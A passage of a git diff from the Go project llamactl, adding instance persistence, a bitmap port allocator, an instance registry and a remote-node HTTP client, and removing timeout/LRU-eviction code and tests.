		t.Errorf("Instance should be running after update, got: %v", updated.GetStatus())
	}

	if got := updated.GetOptions().BackendOptions.LlamaServerOptions.Model; got != newModel {
		t.Errorf("Expected model to be updated")
	}
}
// TestUpdateInstance_ReleasesOldPort checks that moving an instance to a new
// port frees the previous one: a second instance must be able to claim it.
func TestUpdateInstance_ReleasesOldPort(t *testing.T) {
	mgr := createTestManager(t)
	defer mgr.Shutdown()

	const (
		oldPort = 8080
		newPort = 8081
	)

	// llamaOptions builds llama.cpp options for the given model and port.
	llamaOptions := func(model string, port int) *instance.Options {
		return &instance.Options{
			BackendOptions: backends.Options{
				BackendType: backends.BackendTypeLlamaCpp,
				LlamaServerOptions: &backends.LlamaServerOptions{
					Model: model,
					Port:  port,
				},
			},
		}
	}

	inst, err := mgr.CreateInstance("test-instance", llamaOptions("/path/to/model.gguf", oldPort))
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}
	if got := inst.GetPort(); got != oldPort {
		t.Errorf("Expected port 8080, got %d", got)
	}

	// Same model, different port.
	updated, err := mgr.UpdateInstance("test-instance", llamaOptions("/path/to/model.gguf", newPort))
	if err != nil {
		t.Fatalf("UpdateInstance failed: %v", err)
	}
	if got := updated.GetPort(); got != newPort {
		t.Errorf("Expected port 8081, got %d", got)
	}

	// The old port should now be free for another instance.
	if _, err = mgr.CreateInstance("test-instance-2", llamaOptions("/path/to/model2.gguf", oldPort)); err != nil {
		t.Errorf("Should be able to use old port 8080: %v", err)
	}
}

198
pkg/manager/persistence.go Normal file
View File

@@ -0,0 +1,198 @@
package manager
import (
"encoding/json"
"fmt"
"llamactl/pkg/instance"
"log"
"os"
"path/filepath"
"strings"
"sync"
)
// instancePersister provides atomic file-based persistence with durability guarantees.
// Each instance is stored as "<name>.json" inside instancesDir; writes go
// through a "<name>.json.tmp" file that is synced and then renamed into place.
type instancePersister struct {
// mu serializes save, delete and loadAll so their file operations never interleave.
mu sync.Mutex
// instancesDir is the directory that holds the per-instance JSON files.
instancesDir string
}
// newInstancePersister creates a new instance persister rooted at instancesDir.
// The directory is stored verbatim: no validation and no directory creation
// happens here.
// NOTE(review): an empty instancesDir is meant to disable persistence, but the
// constructor does nothing to enforce that; confirm every method that touches
// the filesystem handles the empty case.
func newInstancePersister(instancesDir string) *instancePersister {
return &instancePersister{
instancesDir: instancesDir,
}
}
// save persists an instance to disk with an atomic write.
//
// The instance is marshalled to JSON, written to "<name>.json.tmp" inside
// instancesDir, synced, closed, and finally renamed over "<name>.json", so the
// final file is replaced in a single rename step. Calls are serialized by p.mu.
//
// It returns an error when inst is nil, when the instance name is not safe to
// use as a file name, or when marshalling or any filesystem step fails. On a
// filesystem failure the temporary file is removed (best effort).
//
// When instancesDir is empty, persistence is disabled and save is a no-op for
// otherwise valid input.
func (p *instancePersister) save(inst *instance.Instance) error {
	if inst == nil {
		return fmt.Errorf("cannot save nil instance")
	}

	// Validate instance name to prevent path traversal
	validatedName, err := p.validateInstanceName(inst.Name)
	if err != nil {
		return err
	}

	// An empty directory means persistence is disabled. Without this guard
	// filepath.Join would produce a path relative to the process working
	// directory and the file would be written there.
	if p.instancesDir == "" {
		return nil
	}

	p.mu.Lock()
	defer p.mu.Unlock()

	instancePath := filepath.Join(p.instancesDir, validatedName+".json")
	tempPath := instancePath + ".tmp"

	// Serialize instance to JSON
	jsonData, err := json.MarshalIndent(inst, "", " ")
	if err != nil {
		return fmt.Errorf("failed to marshal instance %s: %w", inst.Name, err)
	}

	// Create temporary file (truncating any leftover from an earlier failed save)
	tempFile, err := os.OpenFile(tempPath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644)
	if err != nil {
		return fmt.Errorf("failed to create temp file for instance %s: %w", inst.Name, err)
	}

	// Write data to temporary file
	if _, err := tempFile.Write(jsonData); err != nil {
		tempFile.Close()
		os.Remove(tempPath)
		return fmt.Errorf("failed to write temp file for instance %s: %w", inst.Name, err)
	}

	// Sync to disk before rename to ensure durability
	if err := tempFile.Sync(); err != nil {
		tempFile.Close()
		os.Remove(tempPath)
		return fmt.Errorf("failed to sync temp file for instance %s: %w", inst.Name, err)
	}

	// Close the file; a close error can still indicate lost data
	if err := tempFile.Close(); err != nil {
		os.Remove(tempPath)
		return fmt.Errorf("failed to close temp file for instance %s: %w", inst.Name, err)
	}

	// Atomic rename (this is atomic on POSIX systems)
	if err := os.Rename(tempPath, instancePath); err != nil {
		os.Remove(tempPath)
		return fmt.Errorf("failed to rename temp file for instance %s: %w", inst.Name, err)
	}

	return nil
}
// delete removes an instance's persistence file ("<name>.json") from disk.
//
// It returns an error when name is not safe to use as a file name or when the
// removal fails for any reason other than the file not existing; a missing
// file is treated as success. Calls are serialized by p.mu.
//
// When instancesDir is empty, persistence is disabled and delete is a no-op
// for otherwise valid input.
func (p *instancePersister) delete(name string) error {
	validatedName, err := p.validateInstanceName(name)
	if err != nil {
		return err
	}

	// An empty directory means persistence is disabled. Without this guard
	// the path would be relative to the process working directory and an
	// unrelated "<name>.json" there could be removed.
	if p.instancesDir == "" {
		return nil
	}

	p.mu.Lock()
	defer p.mu.Unlock()

	instancePath := filepath.Join(p.instancesDir, validatedName+".json")

	if err := os.Remove(instancePath); err != nil {
		if os.IsNotExist(err) {
			// Not an error if file doesn't exist
			return nil
		}
		return fmt.Errorf("failed to delete instance file for %s: %w", name, err)
	}

	return nil
}
// loadAll reads every "*.json" file directly inside instancesDir and returns
// the instances that could be decoded.
//
// A missing directory yields (nil, nil). A failure to list the directory is
// returned as an error. Files that fail to load are logged and skipped; they
// do not make loadAll fail. Sub-directories and files without the ".json"
// suffix are ignored.
func (p *instancePersister) loadAll() ([]*instance.Instance, error) {
	p.mu.Lock()
	defer p.mu.Unlock()

	// Nothing persisted yet if the directory is absent.
	if _, statErr := os.Stat(p.instancesDir); os.IsNotExist(statErr) {
		return nil, nil
	}

	entries, err := os.ReadDir(p.instancesDir)
	if err != nil {
		return nil, fmt.Errorf("failed to read instances directory: %w", err)
	}

	const ext = ".json"

	loaded := make([]*instance.Instance, 0)
	failures := 0

	for _, entry := range entries {
		fileName := entry.Name()
		if entry.IsDir() || !strings.HasSuffix(fileName, ext) {
			continue
		}

		// The file name without its extension is the expected instance name.
		name := strings.TrimSuffix(fileName, ext)

		inst, loadErr := p.loadInstanceFile(name, filepath.Join(p.instancesDir, fileName))
		if loadErr != nil {
			log.Printf("Failed to load instance %s: %v", name, loadErr)
			failures++
			continue
		}

		loaded = append(loaded, inst)
	}

	switch {
	case failures > 0:
		log.Printf("Loaded %d instances with %d errors", len(loaded), failures)
	case len(loaded) > 0:
		log.Printf("Loaded %d instances from persistence", len(loaded))
	}

	return loaded, nil
}
// loadInstanceFile reads and decodes one persisted instance from path.
// name is the instance name derived from the file name; the decoded
// instance must carry the same Name or the file is rejected.
// The caller is expected to hold p.mu already.
func (p *instancePersister) loadInstanceFile(name, path string) (*instance.Instance, error) {
	raw, err := os.ReadFile(path)
	if err != nil {
		return nil, fmt.Errorf("failed to read instance file: %w", err)
	}

	inst := new(instance.Instance)
	if err = json.Unmarshal(raw, inst); err != nil {
		return nil, fmt.Errorf("failed to unmarshal instance: %w", err)
	}

	// Guard against a file whose contents belong to a different instance.
	if inst.Name != name {
		return nil, fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, inst.Name)
	}

	return inst, nil
}
// validateInstanceName checks that name can safely be used as a file name
// inside the instances directory. It returns name unchanged when valid.
//
// Rejected names: the empty string, anything containing "/", "\" or "..",
// and anything starting with ".".
func (p *instancePersister) validateInstanceName(name string) (string, error) {
	switch {
	case name == "":
		return "", fmt.Errorf("instance name cannot be empty")

	// Path separators and parent-directory references would allow path traversal.
	case strings.ContainsAny(name, `/\`) || strings.Contains(name, ".."):
		return "", fmt.Errorf("invalid instance name: %s (cannot contain path separators or '..')", name)

	// A leading dot would create a hidden file.
	case strings.HasPrefix(name, "."):
		return "", fmt.Errorf("invalid instance name: %s (cannot start with '.')", name)
	}

	return name, nil
}

176
pkg/manager/ports.go Normal file
View File

@@ -0,0 +1,176 @@
package manager
import (
"fmt"
"math/bits"
"sync"
)
// portAllocator hands out ports from a fixed inclusive range [minPort, maxPort]
// and tracks them in a bitmap. Marking, clearing and testing a specific port
// are single bit operations; finding a free port scans the bitmap one 64-bit
// word at a time. The bitmap size is fixed at construction, so memory use does
// not grow with the number of allocations.
type portAllocator struct {
// mu guards bitmap and allocated.
mu sync.Mutex
// Bitmap of port states.
// Each bit represents a port (1 = allocated, 0 = free); bit 0 of word 0 is minPort.
bitmap []uint64 // Each uint64 covers 64 ports
// Map port to instance name for cleanup operations
allocated map[int]string
// minPort and maxPort are the inclusive bounds of the managed range.
minPort int
maxPort int
// rangeSize is the number of ports in the range (maxPort - minPort + 1).
rangeSize int
}
// newPortAllocator creates a new port allocator for the inclusive port range
// [minPort, maxPort].
//
// The bitmap gets one bit per port, rounded up to whole 64-bit words. An
// inverted range (maxPort < minPort) is treated as empty: the allocator is
// still returned, but every allocation reports that no ports are available
// or that the port is out of range. Previously a sufficiently inverted range
// produced a negative slice length and panicked.
func newPortAllocator(minPort, maxPort int) *portAllocator {
	rangeSize := maxPort - minPort + 1
	if rangeSize < 0 {
		// Clamp so make() below never receives a negative length.
		rangeSize = 0
	}

	bitmapSize := (rangeSize + 63) / 64 // Round up to nearest uint64

	return &portAllocator{
		bitmap:    make([]uint64, bitmapSize),
		allocated: make(map[int]string),
		minPort:   minPort,
		maxPort:   maxPort,
		rangeSize: rangeSize,
	}
}
// allocate reserves the lowest-numbered free port for instanceName and
// returns it. It fails when instanceName is empty or when every port in the
// range is already taken.
func (p *portAllocator) allocate(instanceName string) (int, error) {
	if len(instanceName) == 0 {
		return 0, fmt.Errorf("instance name cannot be empty")
	}

	p.mu.Lock()
	defer p.mu.Unlock()

	freePort, err := p.findFirstFreeBit()
	if err == nil {
		// Record the reservation in both the bitmap and the owner map.
		p.setBit(freePort)
		p.allocated[freePort] = instanceName
		return freePort, nil
	}
	return 0, err
}
// allocateSpecific reserves exactly the requested port for instanceName.
// It fails when instanceName is empty, when port lies outside
// [minPort, maxPort], or when the port is already reserved.
func (p *portAllocator) allocateSpecific(port int, instanceName string) error {
	if len(instanceName) == 0 {
		return fmt.Errorf("instance name cannot be empty")
	}

	// Range check first: bitmap helpers assume an in-range port.
	if outOfRange := port < p.minPort || port > p.maxPort; outOfRange {
		return fmt.Errorf("port %d is out of range [%d-%d]", port, p.minPort, p.maxPort)
	}

	p.mu.Lock()
	defer p.mu.Unlock()

	if taken := p.isBitSet(port); taken {
		return fmt.Errorf("port %d is already allocated", port)
	}

	p.allocated[port] = instanceName
	p.setBit(port)
	return nil
}
// release frees a single port so it can be handed out again.
// It fails when port lies outside [minPort, maxPort] or is not currently
// reserved.
func (p *portAllocator) release(port int) error {
	if inRange := port >= p.minPort && port <= p.maxPort; !inRange {
		return fmt.Errorf("port %d is out of range [%d-%d]", port, p.minPort, p.maxPort)
	}

	p.mu.Lock()
	defer p.mu.Unlock()

	if p.isBitSet(port) {
		// Drop the reservation from both the owner map and the bitmap.
		delete(p.allocated, port)
		p.clearBit(port)
		return nil
	}
	return fmt.Errorf("port %d is not allocated", port)
}
// releaseByInstance frees every port currently reserved for instanceName and
// reports how many were freed. An empty instanceName frees nothing.
func (p *portAllocator) releaseByInstance(instanceName string) int {
	if instanceName == "" {
		return 0
	}

	p.mu.Lock()
	defer p.mu.Unlock()

	released := 0
	// Removing map entries while ranging over the map is permitted in Go.
	for port, owner := range p.allocated {
		if owner != instanceName {
			continue
		}
		p.clearBit(port)
		delete(p.allocated, port)
		released++
	}

	return released
}
// --- Internal bitmap operations ---
// portToBitPos maps a port to its location in the bitmap: the index of the
// 64-bit word and the bit position inside that word, both counted from minPort.
func (p *portAllocator) portToBitPos(port int) (index int, bit uint) {
	offset := port - p.minPort
	return offset / 64, uint(offset % 64)
}
// setBit turns on the bitmap bit for port, marking it as allocated.
func (p *portAllocator) setBit(port int) {
	word, pos := p.portToBitPos(port)
	mask := uint64(1) << pos
	p.bitmap[word] = p.bitmap[word] | mask
}
// clearBit turns off the bitmap bit for port, marking it as free.
func (p *portAllocator) clearBit(port int) {
	word, pos := p.portToBitPos(port)
	mask := uint64(1) << pos
	p.bitmap[word] = p.bitmap[word] &^ mask
}
// isBitSet reports whether the bitmap bit for port is on (port allocated).
func (p *portAllocator) isBitSet(port int) bool {
	word, pos := p.portToBitPos(port)
	mask := uint64(1) << pos
	return p.bitmap[word]&mask != 0
}
// findFirstFreeBit walks the bitmap word by word and returns the
// lowest-numbered port whose bit is clear. It returns an error when no port in
// [minPort, maxPort] is free.
func (p *portAllocator) findFirstFreeBit() (int, error) {
	for wordIdx, word := range p.bitmap {
		// Inverting the word turns free ports into 1 bits; zero means the
		// word is completely allocated.
		free := ^word
		if free == 0 {
			continue
		}

		candidate := p.minPort + wordIdx*64 + bits.TrailingZeros64(free)

		// The last word may contain padding bits past maxPort; those are
		// never valid ports.
		if candidate > p.maxPort {
			continue
		}
		return candidate, nil
	}

	return 0, fmt.Errorf("no available ports in range [%d-%d]", p.minPort, p.maxPort)
}

121
pkg/manager/registry.go Normal file
View File

@@ -0,0 +1,121 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"sync"
)
// instanceRegistry provides thread-safe storage and lookup of instances,
// plus a separate set of names that are currently marked as running.
// The running set is a sync.Map, so it can be read and updated without
// taking the registry mutex.
type instanceRegistry struct {
// mu guards the instances map.
mu sync.RWMutex
// instances maps instance name to instance.
instances map[string]*instance.Instance
// running holds the names marked as running; it is accessed without holding mu.
running sync.Map // map[string]struct{} - lock-free for status checks
}
// newInstanceRegistry creates a new, empty instance registry.
// Only the instances map needs explicit initialization; the mutex and the
// running sync.Map are usable in their zero state.
func newInstanceRegistry() *instanceRegistry {
return &instanceRegistry{
instances: make(map[string]*instance.Instance),
}
}
// get looks up an instance by name under the read lock.
// It returns (instance, true) when the name is registered and (nil, false)
// otherwise.
func (r *instanceRegistry) get(name string) (*instance.Instance, bool) {
	r.mu.RLock()
	inst, found := r.instances[name]
	r.mu.RUnlock()

	return inst, found
}
// list returns a freshly allocated slice holding every registered instance.
// The slice is a snapshot: later registry changes do not affect it, though
// the instance pointers themselves are shared. Order is unspecified.
func (r *instanceRegistry) list() []*instance.Instance {
	r.mu.RLock()
	defer r.mu.RUnlock()

	snapshot := make([]*instance.Instance, len(r.instances))
	next := 0
	for _, inst := range r.instances {
		snapshot[next] = inst
		next++
	}
	return snapshot
}
// listRunning returns a snapshot slice of the registered instances whose
// names are present in the running set. Order is unspecified.
func (r *instanceRegistry) listRunning() []*instance.Instance {
	r.mu.RLock()
	defer r.mu.RUnlock()

	active := make([]*instance.Instance, 0)
	for name, inst := range r.instances {
		if _, marked := r.running.Load(name); !marked {
			continue
		}
		active = append(active, inst)
	}
	return active
}
// add registers inst under its Name.
// It fails when inst is nil or when the name is already registered. If the
// instance reports itself as running, its name is also put into the running
// set.
func (r *instanceRegistry) add(inst *instance.Instance) error {
	if inst == nil {
		return fmt.Errorf("cannot add nil instance")
	}

	r.mu.Lock()
	defer r.mu.Unlock()

	name := inst.Name
	if _, taken := r.instances[name]; taken {
		return fmt.Errorf("instance %s already exists", name)
	}
	r.instances[name] = inst

	// Seed the running set from the instance's current state.
	if inst.IsRunning() {
		r.running.Store(name, struct{}{})
	}

	return nil
}
// remove unregisters the instance called name and drops it from the running
// set. It fails when no such instance is registered.
func (r *instanceRegistry) remove(name string) error {
	r.mu.Lock()
	defer r.mu.Unlock()

	_, found := r.instances[name]
	if !found {
		return fmt.Errorf("instance %s not found", name)
	}

	r.running.Delete(name)
	delete(r.instances, name)
	return nil
}
// markRunning records name in the running set.
// It does not take r.mu and does not check that name is registered in the
// instances map.
func (r *instanceRegistry) markRunning(name string) {
r.running.Store(name, struct{}{})
}
// markStopped removes name from the running set.
// It does not take r.mu; removing a name that is not in the set is a no-op.
func (r *instanceRegistry) markStopped(name string) {
r.running.Delete(name)
}
// isRunning reports whether name is present in the running set.
// It does not take r.mu and says nothing about whether name is registered in
// the instances map.
func (r *instanceRegistry) isRunning(name string) bool {
_, isRunning := r.running.Load(name)
return isRunning
}
// count reports how many instances are registered, running or not.
func (r *instanceRegistry) count() int {
	r.mu.RLock()
	total := len(r.instances)
	r.mu.RUnlock()

	return total
}

293
pkg/manager/remote.go Normal file
View File

@@ -0,0 +1,293 @@
package manager
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"net/http"
"net/url"
"sync"
"time"
)
// apiBasePath is the URL path prefix for instance endpoints on a remote node;
// the path-escaped instance name is appended to it when building requests.
const apiBasePath = "/api/v1/instances/"
// remoteManager handles HTTP operations for remote instances and keeps track
// of which node each remote instance lives on.
type remoteManager struct {
// mu guards instanceToNode (and the nodeMap lookup done while assigning a node).
mu sync.RWMutex
// client is the HTTP client used for every request to remote nodes.
client *http.Client
// nodeMap is filled once at construction from the configured nodes.
nodeMap map[string]*config.NodeConfig // node name -> node config
// instanceToNode values point at entries of nodeMap.
instanceToNode map[string]*config.NodeConfig // instance name -> node config
}
// newRemoteManager builds a remote manager for the given nodes.
// timeout becomes the HTTP client timeout; a zero or negative value falls
// back to 30 seconds. Each node config is copied, so the manager holds its
// own pointers rather than pointing into the caller's map.
func newRemoteManager(nodes map[string]config.NodeConfig, timeout time.Duration) *remoteManager {
	const defaultTimeout = 30 * time.Second
	if timeout <= 0 {
		timeout = defaultTimeout
	}

	// Index the nodes by name, one private copy per node.
	byName := make(map[string]*config.NodeConfig)
	for name, cfg := range nodes {
		nodeCopy := cfg
		byName[name] = &nodeCopy
	}

	rm := &remoteManager{
		nodeMap:        byName,
		instanceToNode: make(map[string]*config.NodeConfig),
	}
	rm.client = &http.Client{Timeout: timeout}
	return rm
}
// getNodeForInstance looks up the node an instance has been mapped to.
// It returns (node, true) when a mapping exists and (nil, false) otherwise.
func (rm *remoteManager) getNodeForInstance(instanceName string) (*config.NodeConfig, bool) {
	rm.mu.RLock()
	node, mapped := rm.instanceToNode[instanceName]
	rm.mu.RUnlock()

	return node, mapped
}
// setInstanceNode maps instanceName to the configured node called nodeName,
// replacing any earlier mapping. It fails when nodeName is not a known node.
func (rm *remoteManager) setInstanceNode(instanceName, nodeName string) error {
	rm.mu.Lock()
	defer rm.mu.Unlock()

	if node, known := rm.nodeMap[nodeName]; known {
		rm.instanceToNode[instanceName] = node
		return nil
	}
	return fmt.Errorf("node %s not found", nodeName)
}
// removeInstance removes the instance-to-node mapping for instanceName.
// Removing a name that has no mapping is a no-op. The node configuration
// itself stays in nodeMap.
func (rm *remoteManager) removeInstance(instanceName string) {
rm.mu.Lock()
defer rm.mu.Unlock()
delete(rm.instanceToNode, instanceName)
}
// --- HTTP request helpers ---

// makeRemoteRequest builds an HTTP request against a remote node and executes
// it with the manager's client.
//
// The target URL is the node's Address followed by path. A non-nil body is
// JSON-encoded and sent with a JSON Content-Type header. When the node has an
// API key configured it is sent as a Bearer token. The caller owns the
// returned response and must close its body.
func (rm *remoteManager) makeRemoteRequest(ctx context.Context, nodeConfig *config.NodeConfig, method, path string, body any) (*http.Response, error) {
	hasBody := body != nil

	var payload io.Reader
	if hasBody {
		encoded, err := json.Marshal(body)
		if err != nil {
			return nil, fmt.Errorf("failed to marshal request body: %w", err)
		}
		payload = bytes.NewReader(encoded)
	}

	// Named "endpoint" rather than "url" so the net/url package stays visible.
	endpoint := fmt.Sprintf("%s%s", nodeConfig.Address, path)
	req, err := http.NewRequestWithContext(ctx, method, endpoint, payload)
	if err != nil {
		return nil, fmt.Errorf("failed to create request: %w", err)
	}

	if hasBody {
		req.Header.Set("Content-Type", "application/json")
	}
	if key := nodeConfig.APIKey; key != "" {
		req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", key))
	}

	resp, err := rm.client.Do(req)
	if err != nil {
		return nil, fmt.Errorf("failed to execute request: %w", err)
	}
	return resp, nil
}
// parseRemoteResponse parses an HTTP response and unmarshals the result.
func parseRemoteResponse(resp *http.Response, result any) error {
defer resp.Body.Close()
body, err := io.ReadAll(resp.Body)
if err != nil {
return fmt.Errorf("failed to read response body: %w", err)
}
if resp.StatusCode < 200 || resp.StatusCode >= 300 {
return fmt.Errorf("API request failed with status %d: %s", resp.StatusCode, string(body))
}
if result != nil {
if err := json.Unmarshal(body, result); err != nil {
return fmt.Errorf("failed to unmarshal response: %w", err)
}
}
return nil
}
// --- Remote CRUD operations ---

// createInstance POSTs the given options to a remote node to create an
// instance with the given name, and returns the instance decoded from the
// node's JSON reply. The name is path-escaped before being placed in the URL.
func (rm *remoteManager) createInstance(ctx context.Context, node *config.NodeConfig, name string, opts *instance.Options) (*instance.Instance, error) {
	endpoint := apiBasePath + url.PathEscape(name) + "/"

	resp, err := rm.makeRemoteRequest(ctx, node, http.MethodPost, endpoint, opts)
	if err != nil {
		return nil, err
	}

	created := new(instance.Instance)
	if err := parseRemoteResponse(resp, created); err != nil {
		return nil, err
	}
	return created, nil
}
// getInstance issues a GET for the named instance on a remote node and
// returns the instance decoded from the node's JSON reply. The name is
// path-escaped before being placed in the URL.
func (rm *remoteManager) getInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
	endpoint := apiBasePath + url.PathEscape(name) + "/"

	resp, err := rm.makeRemoteRequest(ctx, node, http.MethodGet, endpoint, nil)
	if err != nil {
		return nil, err
	}

	fetched := new(instance.Instance)
	if err := parseRemoteResponse(resp, fetched); err != nil {
		return nil, err
	}
	return fetched, nil
}
// updateInstance PUTs new options for the named instance to a remote node and
// returns the instance decoded from the node's JSON reply. The name is
// path-escaped before being placed in the URL.
func (rm *remoteManager) updateInstance(ctx context.Context, node *config.NodeConfig, name string, opts *instance.Options) (*instance.Instance, error) {
	endpoint := apiBasePath + url.PathEscape(name) + "/"

	resp, err := rm.makeRemoteRequest(ctx, node, http.MethodPut, endpoint, opts)
	if err != nil {
		return nil, err
	}

	updated := new(instance.Instance)
	if err := parseRemoteResponse(resp, updated); err != nil {
		return nil, err
	}
	return updated, nil
}
// deleteInstance sends a DELETE for the named instance to a remote node.
// The response body is discarded; only a transport failure or a non-2xx
// status produces an error.
func (rm *remoteManager) deleteInstance(ctx context.Context, node *config.NodeConfig, name string) error {
	endpoint := apiBasePath + url.PathEscape(name) + "/"

	resp, err := rm.makeRemoteRequest(ctx, node, http.MethodDelete, endpoint, nil)
	if err != nil {
		return err
	}
	return parseRemoteResponse(resp, nil)
}
// startInstance POSTs to the "start" endpoint of the named instance on a
// remote node and returns the instance decoded from the node's JSON reply.
func (rm *remoteManager) startInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
	endpoint := apiBasePath + url.PathEscape(name) + "/start"

	resp, err := rm.makeRemoteRequest(ctx, node, http.MethodPost, endpoint, nil)
	if err != nil {
		return nil, err
	}

	started := new(instance.Instance)
	if err := parseRemoteResponse(resp, started); err != nil {
		return nil, err
	}
	return started, nil
}
// stopInstance POSTs to the "stop" endpoint of the named instance on a
// remote node and returns the instance decoded from the node's JSON reply.
func (rm *remoteManager) stopInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
	endpoint := apiBasePath + url.PathEscape(name) + "/stop"

	resp, err := rm.makeRemoteRequest(ctx, node, http.MethodPost, endpoint, nil)
	if err != nil {
		return nil, err
	}

	stopped := new(instance.Instance)
	if err := parseRemoteResponse(resp, stopped); err != nil {
		return nil, err
	}
	return stopped, nil
}
// restartInstance POSTs to the "restart" endpoint of the named instance on a
// remote node and returns the instance decoded from the node's JSON reply.
func (rm *remoteManager) restartInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
	endpoint := apiBasePath + url.PathEscape(name) + "/restart"

	resp, err := rm.makeRemoteRequest(ctx, node, http.MethodPost, endpoint, nil)
	if err != nil {
		return nil, err
	}

	restarted := new(instance.Instance)
	if err := parseRemoteResponse(resp, restarted); err != nil {
		return nil, err
	}
	return restarted, nil
}
// getInstanceLogs fetches the logs of the named instance from a remote node.
// numLines is forwarded verbatim as the "lines" query parameter. The body of
// a 2xx reply is returned as-is (the logs endpoint replies with plain text,
// not JSON); any other status becomes an error carrying the body text.
func (rm *remoteManager) getInstanceLogs(ctx context.Context, node *config.NodeConfig, name string, numLines int) (string, error) {
	endpoint := fmt.Sprintf("%s%s/logs?lines=%d", apiBasePath, url.PathEscape(name), numLines)

	resp, err := rm.makeRemoteRequest(ctx, node, http.MethodGet, endpoint, nil)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()

	raw, readErr := io.ReadAll(resp.Body)
	if readErr != nil {
		return "", fmt.Errorf("failed to read response body: %w", readErr)
	}

	if success := resp.StatusCode >= 200 && resp.StatusCode < 300; !success {
		return "", fmt.Errorf("API request failed with status %d: %s", resp.StatusCode, string(raw))
	}
	return string(raw), nil
}

View File

@@ -1,64 +0,0 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"log"
)
// checkAllTimeouts stops every instance whose ShouldTimeout reports true.
//
// The names are collected under the read lock and the lock is released
// before StopInstance is called for each of them. Failures are logged and do
// not prevent the remaining instances from being stopped.
func (im *instanceManager) checkAllTimeouts() {
	var expired []string

	im.mu.RLock()
	for _, inst := range im.instances {
		if !inst.ShouldTimeout() {
			continue
		}
		expired = append(expired, inst.Name)
	}
	im.mu.RUnlock()

	for _, name := range expired {
		log.Printf("Instance %s has timed out, stopping it", name)
		_, stopErr := im.StopInstance(name)
		if stopErr != nil {
			log.Printf("Error stopping instance %s: %v", name, stopErr)
			continue
		}
		log.Printf("Instance %s stopped successfully", name)
	}
}
// EvictLRUInstance stops the running instance with the smallest
// LastRequestTime.
//
// Running instances whose IdleTimeout option is set to a value <= 0 are not
// considered. The candidate is chosen under the read lock; the lock is
// released before StopInstance is called. An error is returned when no
// candidate exists or when stopping it fails.
func (im *instanceManager) EvictLRUInstance() error {
	var candidate *instance.Process

	im.mu.RLock()
	for name := range im.runningInstances {
		inst := im.instances[name]
		if inst == nil {
			continue
		}

		// An explicit non-positive idle timeout marks the instance as exempt.
		if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
			continue
		}

		if candidate == nil {
			candidate = inst
		} else if inst.LastRequestTime() < candidate.LastRequestTime() {
			candidate = inst
		}
	}
	im.mu.RUnlock()

	if candidate == nil {
		return fmt.Errorf("failed to find lru instance")
	}

	_, stopErr := im.StopInstance(candidate.Name)
	return stopErr
}

View File

@@ -1,332 +0,0 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
// TestTimeoutFunctionality covers three things without launching a real
// backend process: a manager can be constructed with a timeout check
// interval, an instance created with IdleTimeout reports ShouldTimeout once
// the mocked clock passes that timeout, and an instance created without
// IdleTimeout never reports ShouldTimeout.
func TestTimeoutFunctionality(t *testing.T) {
	// Manager construction with a timeout check interval.
	backendCfg := config.BackendConfig{
		LlamaCpp: config.BackendSettings{Command: "llama-server"},
		MLX:      config.BackendSettings{Command: "mlx_lm.server"},
	}
	instancesCfg := config.InstancesConfig{
		PortRange:            [2]int{8000, 9000},
		TimeoutCheckInterval: 10,
		MaxInstances:         5,
	}

	realManager := manager.NewInstanceManager(backendCfg, instancesCfg)
	if realManager == nil {
		t.Fatal("Manager should be initialized with timeout checker")
	}
	realManager.Shutdown()

	// Everything below works on a test manager and fakes the running state.
	testManager := createTestManager()
	defer testManager.Shutdown()

	oneMinute := 1
	withTimeout := &instance.CreateInstanceOptions{
		IdleTimeout: &oneMinute,
		BackendType: backends.BackendTypeLlamaCpp,
		LlamaServerOptions: &llamacpp.LlamaServerOptions{
			Model: "/path/to/model.gguf",
		},
	}

	inst, err := testManager.CreateInstance("timeout-test", withTimeout)
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}

	// The configured timeout must survive instance creation.
	if inst.GetOptions().IdleTimeout == nil {
		t.Fatal("Instance should have idle timeout configured")
	}
	if got := *inst.GetOptions().IdleTimeout; got != 1 {
		t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
	}

	// Drive the instance with a controllable clock and pretend it is running.
	clock := NewMockTimeProvider(time.Now())
	inst.SetTimeProvider(clock)
	inst.SetStatus(instance.Running)
	inst.UpdateLastRequestTime()

	// Right after a request the instance is not idle yet.
	if inst.ShouldTimeout() {
		t.Error("Instance should not timeout immediately after request")
	}

	// Two minutes later the one-minute timeout has elapsed.
	clock.SetTime(time.Now().Add(2 * time.Minute))
	if !inst.ShouldTimeout() {
		t.Error("Instance should timeout after idle period")
	}

	// Back to stopped so the deferred Shutdown has nothing to stop.
	inst.SetStatus(instance.Stopped)

	// An instance created without IdleTimeout.
	withoutTimeout := &instance.CreateInstanceOptions{
		BackendType: backends.BackendTypeLlamaCpp,
		LlamaServerOptions: &llamacpp.LlamaServerOptions{
			Model: "/path/to/model.gguf",
		},
	}

	noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", withoutTimeout)
	if err != nil {
		t.Fatalf("CreateInstance failed: %v", err)
	}

	noTimeoutInst.SetTimeProvider(clock)
	noTimeoutInst.SetStatus(instance.Running)
	noTimeoutInst.UpdateLastRequestTime()

	// The clock is already advanced; this instance must still not time out.
	if noTimeoutInst.ShouldTimeout() {
		t.Error("Instance without timeout configuration should never timeout")
	}

	// Back to stopped so the deferred Shutdown has nothing to stop.
	noTimeoutInst.SetStatus(instance.Stopped)
}
// TestEvictLRUInstance_Success creates three instances marked as running with
// increasing last-request times and verifies that EvictLRUInstance stops only
// the one with the oldest request time.
//
